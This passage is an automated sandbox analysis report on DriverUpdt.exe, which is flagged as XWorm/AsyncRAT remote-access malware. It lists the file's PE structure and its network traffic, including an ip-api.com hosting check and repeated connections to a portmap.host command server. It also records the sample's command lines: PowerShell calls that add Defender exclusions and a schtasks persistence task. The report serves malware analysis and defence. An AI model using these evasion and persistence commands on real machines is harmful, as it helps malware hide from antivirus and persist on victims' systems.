                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x4de.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x147640x14800fe1fb6b6ebc82d471d994033bc77f929False0.6055163871951219data5.98433140864096IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x180000x4de0x600e3575bc3f61464e22b07945e182ef084False0.376953125data3.7515270043715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x1a0000xc0x200ca717e9c532730ff63d09608f29eb26aFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0x180a00x254data0.4664429530201342
                          RT_MANIFEST0x182f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 2, 2024 00:33:46.197632074 CEST4970480192.168.2.5208.95.112.1
                          Jul 2, 2024 00:33:46.204066992 CEST8049704208.95.112.1192.168.2.5
                          Jul 2, 2024 00:33:46.204144001 CEST4970480192.168.2.5208.95.112.1
                          Jul 2, 2024 00:33:46.205002069 CEST4970480192.168.2.5208.95.112.1
                          Jul 2, 2024 00:33:46.214745045 CEST8049704208.95.112.1192.168.2.5
                          Jul 2, 2024 00:33:46.707642078 CEST8049704208.95.112.1192.168.2.5
                          Jul 2, 2024 00:33:46.754005909 CEST4970480192.168.2.5208.95.112.1
                          Jul 2, 2024 00:34:33.014759064 CEST8049704208.95.112.1192.168.2.5
                          Jul 2, 2024 00:34:33.014827967 CEST4970480192.168.2.5208.95.112.1
                          Jul 2, 2024 00:34:45.773448944 CEST4971437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:45.784511089 CEST3753749714193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:45.784588099 CEST4971437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:45.846585035 CEST4971437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:45.851510048 CEST3753749714193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:47.535904884 CEST3753749714193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:47.538517952 CEST4971437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:50.535537004 CEST4971437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:50.536799908 CEST4971537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:50.847866058 CEST4971437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:51.457243919 CEST4971437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:51.508445978 CEST3753749714193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:51.508459091 CEST3753749715193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:51.508466959 CEST3753749714193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:51.508644104 CEST4971437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:51.508645058 CEST4971537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:51.515245914 CEST3753749714193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:51.515330076 CEST4971437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:51.524517059 CEST4971537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:51.539237976 CEST3753749715193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:53.267940044 CEST3753749715193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:53.267997026 CEST4971537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:56.114512920 CEST4971537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:56.117841005 CEST4971937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:56.121367931 CEST3753749715193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:56.124607086 CEST3753749719193.161.193.99192.168.2.5
                          Jul 2, 2024 00:34:56.127286911 CEST4971937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:56.156558990 CEST4971937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:34:56.163687944 CEST3753749719193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:03.269603968 CEST3753749719193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:03.270360947 CEST4971937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:05.176206112 CEST4971937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:05.178131104 CEST4972237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:05.182427883 CEST3753749719193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:05.184741974 CEST3753749722193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:05.184822083 CEST4972237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:05.203851938 CEST4972237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:05.210661888 CEST3753749722193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:06.923130989 CEST3753749722193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:06.923199892 CEST4972237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:10.254674911 CEST4972237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:10.257390022 CEST4972337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:10.260924101 CEST3753749722193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:10.263801098 CEST3753749723193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:10.263881922 CEST4972337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:10.320947886 CEST4972337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:10.327651024 CEST3753749723193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:12.043107033 CEST3753749723193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:12.043211937 CEST4972337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:15.848053932 CEST4972337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:15.849411964 CEST4972437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:15.854585886 CEST3753749723193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:15.855654955 CEST3753749724193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:15.855737925 CEST4972437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:15.874043941 CEST4972437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:15.880697012 CEST3753749724193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:17.595630884 CEST3753749724193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:17.595707893 CEST4972437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:20.301146030 CEST4972437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:20.303231001 CEST4972537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:20.307298899 CEST3753749724193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:20.309498072 CEST3753749725193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:20.309576035 CEST4972537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:20.324985027 CEST4972537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:20.331962109 CEST3753749725193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:22.098975897 CEST3753749725193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:22.099060059 CEST4972537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:24.863615990 CEST4972537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:24.864820004 CEST4972637537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:24.870155096 CEST3753749725193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:24.871306896 CEST3753749726193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:24.871395111 CEST4972637537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:24.886356115 CEST4972637537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:24.893541098 CEST3753749726193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:26.645062923 CEST3753749726193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:26.648344994 CEST4972637537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:26.740842104 CEST4970480192.168.2.5208.95.112.1
                          Jul 2, 2024 00:35:26.745645046 CEST8049704208.95.112.1192.168.2.5
                          Jul 2, 2024 00:35:27.301207066 CEST4972637537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:27.302599907 CEST4972737537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:27.306016922 CEST3753749726193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:27.308037043 CEST3753749727193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:27.308124065 CEST4972737537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:27.324893951 CEST4972737537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:27.329920053 CEST3753749727193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:29.054744959 CEST3753749727193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:29.054908991 CEST4972737537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:30.441868067 CEST4972737537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:30.443960905 CEST4972837537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:30.448684931 CEST3753749727193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:30.451297045 CEST3753749728193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:30.451431036 CEST4972837537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:30.475025892 CEST4972837537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:30.482618093 CEST3753749728193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:32.255877972 CEST3753749728193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:32.256383896 CEST4972837537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:33.067015886 CEST4972837537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:33.068315029 CEST4972937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:33.073537111 CEST3753749728193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:33.075165987 CEST3753749729193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:33.075265884 CEST4972937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:33.092715025 CEST4972937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:33.099128008 CEST3753749729193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:34.876701117 CEST3753749729193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:34.879236937 CEST4972937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.457391977 CEST4972937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.459508896 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.462172985 CEST3753749729193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:35.464241028 CEST3753749730193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:35.464338064 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.481043100 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.485820055 CEST3753749730193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:37.240408897 CEST3753749730193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:37.240520000 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.316951990 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.318658113 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.323427916 CEST3753749730193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:37.325433969 CEST3753749731193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:37.325562954 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.342818975 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.350259066 CEST3753749731193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:39.065277100 CEST3753749731193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:39.065551996 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.618458033 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.620426893 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.625572920 CEST3753749731193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:39.627330065 CEST3753749732193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:39.627415895 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.643261909 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.650187969 CEST3753749732193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:41.362987995 CEST3753749732193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:41.364092112 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.176120996 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.177405119 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.183255911 CEST3753749732193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:42.184659958 CEST3753749733193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:42.184731960 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.199575901 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.207813025 CEST3753749733193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:43.946019888 CEST3753749733193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:43.946132898 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.421952009 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.428664923 CEST3753749733193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:44.440462112 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.447000027 CEST3753749734193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:44.447093964 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.463929892 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.470874071 CEST3753749734193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:46.237910032 CEST3753749734193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:46.238002062 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.446986914 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.451395988 CEST4973537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.452332020 CEST3753749734193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:46.457129955 CEST3753749735193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:46.457225084 CEST4973537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.517920971 CEST4973537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.522751093 CEST3753749735193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:48.209928989 CEST3753749735193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:48.212846994 CEST4973537537192.168.2.5193.161.193.99

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 2, 2024 00:33:46.177464962 CEST5082253192.168.2.51.1.1.1
                          Jul 2, 2024 00:33:46.190888882 CEST53508221.1.1.1192.168.2.5
                          Jul 2, 2024 00:34:45.746242046 CEST5816153192.168.2.51.1.1.1
                          Jul 2, 2024 00:34:45.768017054 CEST53581611.1.1.1192.168.2.5

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 2, 2024 00:33:46.177464962 CEST192.168.2.51.1.1.10xc169Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                          Jul 2, 2024 00:34:45.746242046 CEST192.168.2.51.1.1.10xc617Standard query (0)stewiegriffin-37537.portmap.hostA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 2, 2024 00:33:46.190888882 CEST1.1.1.1192.168.2.50xc169No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                          Jul 2, 2024 00:34:45.768017054 CEST1.1.1.1192.168.2.50xc617No error (0)stewiegriffin-37537.portmap.host193.161.193.99A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • ip-api.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549704208.95.112.1805520C:\Users\user\Desktop\DriverUpdt.exe
                          TimestampBytes transferredDirectionData
                          Jul 2, 2024 00:33:46.205002069 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Jul 2, 2024 00:33:46.707642078 CEST175INHTTP/1.1 200 OK
                          Date: Mon, 01 Jul 2024 22:33:46 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 6
                          Access-Control-Allow-Origin: *
                          X-Ttl: 60
                          X-Rl: 44
                          Data Raw: 66 61 6c 73 65 0a
                          Data Ascii: false


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:18:33:41
                          Start date:01/07/2024
                          Path:C:\Users\user\Desktop\DriverUpdt.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\DriverUpdt.exe"
                          Imagebase:0xdf0000
                          File size:86'528 bytes
                          MD5 hash:65485B0475B6C8A3B4F35BBA541938A6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:2
                          Start time:18:33:45
                          Start date:01/07/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:3
                          Start time:18:33:45
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:18:33:51
                          Start date:01/07/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe'
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:6
                          Start time:18:33:51
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:8
                          Start time:18:34:02
                          Start date:01/07/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:9
                          Start time:18:34:02
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:10
                          Start time:18:34:18
                          Start date:01/07/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt'
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:11
                          Start time:18:34:18
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:14
                          Start time:18:34:39
                          Start date:01/07/2024
                          Path:C:\Windows\System32\schtasks.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"
                          Imagebase:0x7ff753ed0000
                          File size:235'008 bytes
                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:15
                          Start time:18:34:39
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:16
                          Start time:18:34:41
                          Start date:01/07/2024
                          Path:C:\Users\user\AppData\Roaming\DriverUpdt
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\DriverUpdt
                          Imagebase:0x2d0000
                          File size:86'528 bytes
                          MD5 hash:65485B0475B6C8A3B4F35BBA541938A6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 84%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:17
                          Start time:18:34:51
                          Start date:01/07/2024
                          Path:C:\Windows\System32\OpenWith.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                          Imagebase:0x7ff6cd8c0000
                          File size:123'984 bytes
                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:18
                          Start time:18:34:51
                          Start date:01/07/2024
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Imagebase:0x7ff7e52b0000
                          File size:55'320 bytes
                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:19
                          Start time:18:34:59
                          Start date:01/07/2024
                          Path:C:\Windows\System32\OpenWith.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                          Imagebase:0x7ff6cd8c0000
                          File size:123'984 bytes
                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:20
                          Start time:18:35:01
                          Start date:01/07/2024
                          Path:C:\Users\user\AppData\Roaming\DriverUpdt
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\DriverUpdt
                          Imagebase:0x840000
                          File size:86'528 bytes
                          MD5 hash:65485B0475B6C8A3B4F35BBA541938A6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:21.8%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:9.7%
                            Total number of Nodes:31
                            Total number of Limit Nodes:1
